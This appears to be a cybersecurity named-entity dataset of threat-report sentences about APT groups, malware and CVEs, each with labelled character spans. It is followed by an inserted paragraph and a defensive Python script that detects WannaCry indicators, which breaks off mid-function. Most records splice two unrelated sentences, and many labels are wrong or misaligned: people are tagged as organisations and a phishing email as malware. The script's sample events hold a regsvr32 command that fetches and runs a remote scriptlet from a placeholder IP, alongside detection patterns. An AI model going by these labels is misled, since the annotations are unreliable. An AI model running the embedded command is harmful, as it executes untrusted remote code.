CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 90, "end": 110, "label": "Organization"}, {"start": 154, "end": 160, "label": "Organization"}]} {"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": [{"start": 80, "end": 88, "label": "Malware"}, {"start": 386, "end": 395, "label": "Organization"}]} {"text": "Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 17, "end": 25, "label": "Organization"}, {"start": 176, "end": 182, "label": "System"}, {"start": 197, "end": 217, "label": "Organization"}, {"start": 259, "end": 292, "label": "Indicator"}, {"start": 312, "end": 325, "label": "Vulnerability"}]} {"text": "February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28\u2019s Xagent malware , and a new Trojan ransomware . 
In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": [{"start": 181, "end": 189, "label": "Organization"}, {"start": 211, "end": 218, "label": "Organization"}, {"start": 246, "end": 263, "label": "Malware"}, {"start": 412, "end": 418, "label": "System"}, {"start": 429, "end": 449, "label": "Organization"}]} {"text": "Per a 2015 report from CitizenLab , Gamma Group licenses their software to clients and each client uses unique infrastructure , making it likely that the two documents are being used by a single client . The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": [{"start": 23, "end": 33, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 111, "end": 125, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 403, "end": 412, "label": "Organization"}]} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . 
Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}, {"start": 150, "end": 164, "label": "Organization"}, {"start": 216, "end": 222, "label": "Malware"}, {"start": 225, "end": 233, "label": "Malware"}, {"start": 240, "end": 244, "label": "Malware"}, {"start": 345, "end": 359, "label": "Organization"}]} {"text": "LATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015 . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 81, "end": 108, "label": "Organization"}, {"start": 145, "end": 158, "label": "Organization"}, {"start": 191, "end": 209, "label": "Organization"}, {"start": 229, "end": 235, "label": "System"}, {"start": 281, "end": 293, "label": "System"}, {"start": 294, "end": 307, "label": "Vulnerability"}]} {"text": "It is capable of a variety of functions , including credential theft , hard drive and data wiping , disabling security software , and remote desktop functionality . 
In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": [{"start": 52, "end": 68, "label": "Malware"}, {"start": 71, "end": 81, "label": "Malware"}, {"start": 86, "end": 97, "label": "Malware"}, {"start": 100, "end": 127, "label": "Malware"}, {"start": 134, "end": 162, "label": "Malware"}, {"start": 300, "end": 305, "label": "Organization"}]} {"text": "Additionally , this incident exposes the global nature of cyber threats and the value of worldwide perspective \u2013 a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 258, "end": 266, "label": "Organization"}, {"start": 340, "end": 360, "label": "Organization"}, {"start": 401, "end": 409, "label": "Vulnerability"}]} {"text": "Recent DRIDEX activity began following a disclosure on April 7 , 2017 . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 155, "end": 175, "label": "Organization"}, {"start": 216, "end": 224, "label": "Vulnerability"}]} {"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . 
Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": [{"start": 37, "end": 47, "label": "Organization"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 212, "end": 217, "label": "Organization"}]} {"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": [{"start": 37, "end": 54, "label": "Organization"}, {"start": 99, "end": 113, "label": "Organization"}, {"start": 283, "end": 293, "label": "Organization"}]} {"text": "FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . 
The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 26, "end": 32, "label": "Organization"}, {"start": 56, "end": 67, "label": "Organization"}, {"start": 120, "end": 133, "label": "Vulnerability"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 373, "end": 379, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 513, "end": 533, "label": "Organization"}, {"start": 538, "end": 550, "label": "Organization"}, {"start": 569, "end": 577, "label": "Organization"}, {"start": 594, "end": 615, "label": "Organization"}, {"start": 628, "end": 638, "label": "Organization"}]} {"text": "Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities . 
Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek \u2014 the CEOs of Facebook , Twitter , Google and Spotify , respectively \u2014 have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 10, "end": 15, "label": "Organization"}, {"start": 114, "end": 122, "label": "Organization"}, {"start": 134, "end": 149, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 166, "end": 179, "label": "Organization"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 231, "end": 237, "label": "Organization"}, {"start": 360, "end": 370, "label": "Organization"}]} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . 
The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 260, "end": 263, "label": "Indicator"}, {"start": 311, "end": 318, "label": "Organization"}, {"start": 356, "end": 371, "label": "Organization"}, {"start": 375, "end": 382, "label": "Organization"}, {"start": 387, "end": 396, "label": "Organization"}, {"start": 426, "end": 434, "label": "Organization"}, {"start": 439, "end": 449, "label": "Organization"}]} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 96, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 138, "end": 141, "label": "Indicator"}, {"start": 189, "end": 196, "label": "Organization"}, {"start": 234, "end": 249, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 317, "end": 327, "label": "Organization"}]} {"text": "It is possible that CVE-2017-8759 was being used by additional actors . 
Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": [{"start": 20, "end": 33, "label": "Vulnerability"}, {"start": 63, "end": 69, "label": "Organization"}, {"start": 115, "end": 123, "label": "Malware"}, {"start": 164, "end": 173, "label": "Organization"}, {"start": 184, "end": 200, "label": "Organization"}]} {"text": "Russian cyber espionage actors use zero-day exploits in addition to less complex measures . Further tracking of the Lazarus\u2019s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": [{"start": 116, "end": 125, "label": "Organization"}, {"start": 149, "end": 158, "label": "Organization"}, {"start": 254, "end": 264, "label": "Malware"}, {"start": 276, "end": 283, "label": "System"}, {"start": 321, "end": 336, "label": "Organization"}]} {"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": [{"start": 20, "end": 31, "label": "Vulnerability"}, {"start": 43, "end": 53, "label": "System"}, {"start": 82, "end": 88, "label": "Organization"}, {"start": 124, "end": 129, "label": "Organization"}, {"start": 217, "end": 223, "label": "Organization"}]} {"text": "Given the release of sensitive victim data , extortion , and destruction of systems , FireEye considers FIN10 to be one of the most disruptive threat actors observed in the region so far . 
Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": [{"start": 86, "end": 93, "label": "Organization"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 377, "end": 393, "label": "Organization"}]} {"text": "To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 66, "end": 70, "label": "Organization"}, {"start": 100, "end": 117, "label": "System"}, {"start": 134, "end": 145, "label": "Malware"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 301, "end": 318, "label": "Indicator"}, {"start": 383, "end": 388, "label": "Organization"}]} {"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . 
The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 51, "end": 55, "label": "Organization"}, {"start": 132, "end": 144, "label": "Malware"}, {"start": 156, "end": 164, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 217, "end": 226, "label": "Organization"}, {"start": 231, "end": 251, "label": "Organization"}, {"start": 291, "end": 297, "label": "System"}, {"start": 340, "end": 349, "label": "Organization"}]} {"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 21, "label": "Organization"}, {"start": 156, "end": 163, "label": "Organization"}, {"start": 220, "end": 229, "label": "Organization"}, {"start": 276, "end": 282, "label": "System"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 308, "end": 328, "label": "Organization"}, {"start": 364, "end": 379, "label": "Organization"}]} {"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . 
The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 51, "end": 55, "label": "Organization"}, {"start": 132, "end": 144, "label": "Malware"}, {"start": 156, "end": 164, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 206, "end": 220, "label": "Malware"}, {"start": 225, "end": 238, "label": "Malware"}, {"start": 239, "end": 246, "label": "Malware"}, {"start": 278, "end": 298, "label": "Organization"}]} {"text": "CARBANAK malware has been used heavily by FIN7 in previous operations . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 42, "end": 46, "label": "Organization"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 103, "end": 117, "label": "Malware"}, {"start": 122, "end": 135, "label": "Malware"}, {"start": 136, "end": 143, "label": "Malware"}, {"start": 175, "end": 195, "label": "Organization"}]} {"text": "We have not yet identified FIN7\u2019s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . 
The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 27, "end": 33, "label": "Organization"}, {"start": 113, "end": 129, "label": "Malware"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 312, "end": 332, "label": "Organization"}, {"start": 372, "end": 378, "label": "System"}, {"start": 421, "end": 430, "label": "Organization"}]} {"text": "If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 7, "end": 16, "label": "Organization"}, {"start": 315, "end": 323, "label": "Organization"}, {"start": 328, "end": 348, "label": "Organization"}, {"start": 401, "end": 408, "label": "Organization"}, {"start": 413, "end": 423, "label": "Organization"}, {"start": 443, "end": 450, "label": "Organization"}, {"start": 455, "end": 466, "label": "Organization"}]} {"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 15, "end": 31, "label": "System"}, {"start": 35, "end": 39, "label": "Organization"}, {"start": 179, "end": 199, "label": "Organization"}, {"start": 389, "end": 400, "label": "Organization"}, {"start": 403, "end": 413, "label": "Organization"}, {"start": 416, "end": 432, "label": "Organization"}, {"start": 435, "end": 449, "label": "Organization"}, {"start": 456, "end": 466, "label": "Organization"}, {"start": 471, "end": 478, "label": "Organization"}, {"start": 502, "end": 520, "label": "Organization"}]} {"text": "Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 24, "end": 38, "label": "Malware"}, {"start": 228, "end": 239, "label": "Organization"}, {"start": 244, "end": 254, "label": "Organization"}, {"start": 257, "end": 273, "label": "Organization"}, {"start": 276, "end": 290, "label": "Organization"}, {"start": 297, "end": 307, "label": "Organization"}, {"start": 312, "end": 319, "label": "Organization"}, {"start": 343, "end": 361, "label": "Organization"}]} {"text": "The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . 
APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 4, "end": 19, "label": "System"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 200, "end": 221, "label": "Organization"}, {"start": 241, "end": 247, "label": "System"}]} {"text": "HawkEye is a versatile Trojan used by diverse actors for multiple purposes . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 46, "end": 52, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 163, "end": 171, "label": "Organization"}, {"start": 175, "end": 183, "label": "Organization"}]} {"text": "We have seen different HawkEye campaigns infecting organizations across many sectors globally , and stealing user credentials for diverse online services . Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 164, "end": 184, "label": "Organization"}, {"start": 187, "end": 206, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 223, "end": 250, "label": "Organization"}, {"start": 257, "end": 264, "label": "Organization"}, {"start": 286, "end": 296, "label": "Organization"}]} {"text": "Mandiant disclosed these vulnerabilities to Lenovo in May of 2016 . 
In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 178, "end": 189, "label": "Organization"}, {"start": 214, "end": 224, "label": "Organization"}, {"start": 229, "end": 240, "label": "Organization"}]} {"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 8, "end": 16, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 341, "end": 352, "label": "Indicator"}, {"start": 412, "end": 420, "label": "Organization"}]} {"text": "As we noted in M-Trends 2016 , Mandiant\u2019s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment , so 99 days is still 96 days too long . 
In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": [{"start": 15, "end": 23, "label": "Organization"}, {"start": 31, "end": 41, "label": "Organization"}, {"start": 226, "end": 244, "label": "Organization"}, {"start": 274, "end": 279, "label": "Organization"}, {"start": 358, "end": 366, "label": "Organization"}, {"start": 391, "end": 411, "label": "Organization"}]} {"text": "On top of our analysis of recent trends , M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": [{"start": 42, "end": 50, "label": "Organization"}, {"start": 83, "end": 90, "label": "Organization"}, {"start": 151, "end": 156, "label": "Organization"}, {"start": 177, "end": 183, "label": "System"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 223, "end": 240, "label": "Organization"}]} {"text": "In Figure 1 , which is based on FireEye Dynamic threat Intelligence (DTI) reports shared in March 2017 , we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017 . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": [{"start": 32, "end": 39, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 253, "end": 268, "label": "Organization"}, {"start": 271, "end": 286, "label": "Organization"}, {"start": 293, "end": 303, "label": "Organization"}, {"start": 367, "end": 390, "label": "Organization"}]} {"text": "Magnitude EK activity then fell off the radar until Oct. 15 , 2017 , when it came back and began focusing solely on South Korea . 
The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 208, "end": 217, "label": "Organization"}]} {"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 87, "end": 94, "label": "Organization"}, {"start": 112, "end": 132, "label": "System"}, {"start": 170, "end": 175, "label": "Organization"}, {"start": 242, "end": 254, "label": "Organization"}, {"start": 275, "end": 292, "label": "Organization"}]} {"text": "Throughout the final quarter of 2016 and first month of 2017 , FireEye Dynamic Threat Intelligence (DTI) observed consistent Magnitude EK hits from several customers , the majority of whom reside in the APAC region . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": [{"start": 63, "end": 70, "label": "Organization"}, {"start": 125, "end": 137, "label": "System"}, {"start": 255, "end": 276, "label": "Indicator"}, {"start": 318, "end": 327, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}]} {"text": "In January 2017 , new domain names appeared in the campaign hosted on a different IP location . 
The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 111, "end": 118, "label": "Malware"}, {"start": 216, "end": 230, "label": "Organization"}]} {"text": "Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": [{"start": 25, "end": 37, "label": "Malware"}, {"start": 82, "end": 87, "label": "Organization"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 131, "end": 136, "label": "Organization"}, {"start": 153, "end": 193, "label": "Organization"}, {"start": 280, "end": 300, "label": "Organization"}]} {"text": "This trend continued until late September 2017 , when we saw Magnitude EK focus primarily on the APAC region , with a large chunk targeting South Korea . 
Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": [{"start": 61, "end": 73, "label": "System"}, {"start": 160, "end": 166, "label": "Organization"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 209, "end": 222, "label": "Organization"}, {"start": 283, "end": 304, "label": "Organization"}, {"start": 307, "end": 318, "label": "Organization"}, {"start": 321, "end": 332, "label": "Organization"}, {"start": 339, "end": 349, "label": "Organization"}]} {"text": "These ransomware payloads only seem to target Korean systems , since they won\u2019t execute if the system language is not Korean . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 6, "end": 16, "label": "System"}, {"start": 147, "end": 155, "label": "Malware"}, {"start": 222, "end": 231, "label": "Organization"}, {"start": 272, "end": 290, "label": "Organization"}, {"start": 314, "end": 323, "label": "Organization"}]} {"text": "The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . 
Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 168, "end": 187, "label": "System"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 308, "end": 316, "label": "Organization"}, {"start": 408, "end": 415, "label": "Malware"}]} {"text": "In our Revoke-Obfuscation white paper , first presented at Black Hat USA 2017 , we provide background on obfuscated PowerShell attacks seen in the wild , as well as defensive mitigation and logging best practices . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 59, "end": 68, "label": "Organization"}, {"start": 292, "end": 300, "label": "Organization"}, {"start": 392, "end": 399, "label": "Malware"}]} {"text": "The malware leverages an exploit , codenamed EternalBlue\u201d , that was released by the Shadow Brokers on April 14 , 2017 . Gallmaker 's targets are embassies of an Eastern European country .", "spans": [{"start": 45, "end": 57, "label": "Vulnerability"}, {"start": 85, "end": 99, "label": "Organization"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 146, "end": 155, "label": "Organization"}]} {"text": "The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . 
However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 50, "end": 65, "label": "Malware"}, {"start": 221, "end": 225, "label": "Organization"}, {"start": 259, "end": 267, "label": "Malware"}, {"start": 297, "end": 306, "label": "Organization"}]} {"text": "The malware then builds two DLLs in memory \u2013 they are 32 and 64-bit DLLs that have identical functionality . 360 and Tuisec already identified some Gorgon Group members .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 28, "end": 32, "label": "Malware"}, {"start": 109, "end": 112, "label": "Organization"}, {"start": 117, "end": 123, "label": "Organization"}, {"start": 148, "end": 160, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}]} {"text": "The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 50, "end": 61, "label": "Malware"}, {"start": 145, "end": 153, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 225, "end": 234, "label": "Organization"}]} {"text": "The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . 
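The WannaCry records above list concrete host indicators (a service named mssecsvc2.0 whose binary path carries the arguments "-m security", the dropped file C:\WINDOWS\tasksche.exe, and the .WCRY extension on encrypted files), and an earlier record mentions the regsvr32.exe application-whitelisting bypass without detail. The following is an added detection example, not code from the page, the dataset, or any vendor: it runs a handful of rules over constructed Sysmon-style JSON event lines and correlates hits per host. The event field names and the sample lines are constructed for this example; the regsvr32 command-line shape it matches (a /i: argument pointing at a remote scriptlet, or scrobj.dll on the command line) is the publicly documented form of that bypass and is an assumption, since the page does not describe it.

```python
"""
Added example (not from the page): match WannaCry host indicators and the
regsvr32 scriptlet bypass in Sysmon-style JSON event lines, then give each
host a verdict.  Event shape and sample lines are constructed here.
"""
import json
import re
from typing import Dict, Iterable, List, Set, Tuple

# Constructed sample events (one JSON object per line). Raw strings keep the
# doubled backslashes that JSON needs for Windows paths.
SAMPLE_EVENTS = [
    r'{"event":"service_install","host":"ws01","service_name":"mssecsvc2.0","image_path":"C:\\Users\\bob\\Downloads\\mssecsvc.exe -m security"}',
    r'{"event":"file_create","host":"ws01","path":"C:\\WINDOWS\\tasksche.exe","image":"C:\\Users\\bob\\Downloads\\mssecsvc.exe"}',
    r'{"event":"file_create","host":"ws01","path":"C:\\Users\\bob\\Documents\\q3-forecast.xlsx.WCRY"}',
    r'{"event":"process_create","host":"ws02","image":"C:\\Windows\\System32\\regsvr32.exe","command_line":"regsvr32.exe /s /n /u /i:http://198.51.100.7/reg.sct scrobj.dll"}',
    r'{"event":"process_create","host":"ws03","image":"C:\\Windows\\System32\\regsvr32.exe","command_line":"regsvr32.exe /s C:\\Program Files\\Vendor\\ctl.dll"}',
    r'{"event":"service_install","host":"ws03","service_name":"Spooler","image_path":"C:\\Windows\\System32\\spoolsv.exe"}',
    "this line is not JSON and must be skipped, not crash the scan",
]

def wannacry_service(ev: dict) -> bool:
    # Page: service mssecsvc2.0, binary path = running module + "-m security".
    if ev.get("event") != "service_install":
        return False
    name = ev.get("service_name", "").lower()
    path = ev.get("image_path", "").lower()
    return name == "mssecsvc2.0" or path.endswith(" -m security")

def wannacry_dropper(ev: dict) -> bool:
    # Page: the R resource is written to C:\WINDOWS\tasksche.exe.
    return (ev.get("event") == "file_create"
            and ev.get("path", "").lower() == r"c:\windows\tasksche.exe")

def wcry_extension(ev: dict) -> bool:
    # Page: encrypted files get the .WCRY extension.
    return (ev.get("event") == "file_create"
            and ev.get("path", "").lower().endswith(".wcry"))

# Assumption (publicly documented, not on the page): the bypass runs
# regsvr32 with /i:<remote .sct> and scrobj.dll as the DLL to "register".
REMOTE_SCRIPTLET = re.compile(r"/i:\s*(?:https?|ftp)://", re.IGNORECASE)

def regsvr32_bypass(ev: dict) -> bool:
    if ev.get("event") != "process_create":
        return False
    if not ev.get("image", "").lower().endswith("regsvr32.exe"):
        return False
    cmd = ev.get("command_line", "")
    return bool(REMOTE_SCRIPTLET.search(cmd)) or "scrobj.dll" in cmd.lower()

RULES = {
    "wannacry_service": wannacry_service,
    "wannacry_dropper": wannacry_dropper,
    "wcry_extension": wcry_extension,
    "regsvr32_bypass": regsvr32_bypass,
}
WANNACRY_RULES = {"wannacry_service", "wannacry_dropper", "wcry_extension"}

def scan(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
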